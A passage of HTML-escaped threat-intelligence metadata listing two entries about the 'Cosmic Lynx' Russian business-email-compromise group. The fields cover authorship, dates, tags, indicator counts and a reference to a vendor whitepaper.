nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-07-07T19:42:52.567000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'12&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'Cosmic&nbsp;Lynx:&nbsp;The&nbsp;Rise&nbsp;of&nbsp;A&nbsp;Russian&nbsp;BEC&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Group',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'web',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;['https://www.agari.com/cyber-intelligence-research/whitepapers/acid-agari-cosmic-lynx.pdf'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'domain',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;114944,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['BEC',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Phishing',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'social&nbsp;engineering',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Russia',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Email',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'COVID-19'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'white',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx20-web-media.s3.amazonaws.com/media/avatars/user_94093/resized/80/avatar_281f69b768.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'94093',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'Sand-Storm'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-07-07T14:53:12.330000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;10,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5f048c58d60cfdb1a2e82d2e',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;126,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{'IPv4':&nbsp;61,&nbsp;'domain':&nbsp;65},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-07-07T14:53:12.330000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'13&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'Cosmic&nbsp;Lynx&nbsp;The&nbsp;Rise&nbsp;of&nbsp;Russian&nbsp;BEC',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'web',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;['https://www.agari.com/cyber-intelligence-research/whitepapers/acid-agari-cosmic-lynx.pdf'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'domain',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;139,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['”&nbsp;“&nbsp;corporate',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'”&nbsp;“&nbsp;matter',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'”&nbsp;“&nbsp;law',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'march',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'”&nbsp;“&nbsp;potential',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'”&nbsp;“&nbsp;new',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'”&nbsp;“&nbsp;possible',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'january',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'“&nbsp;corporate',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n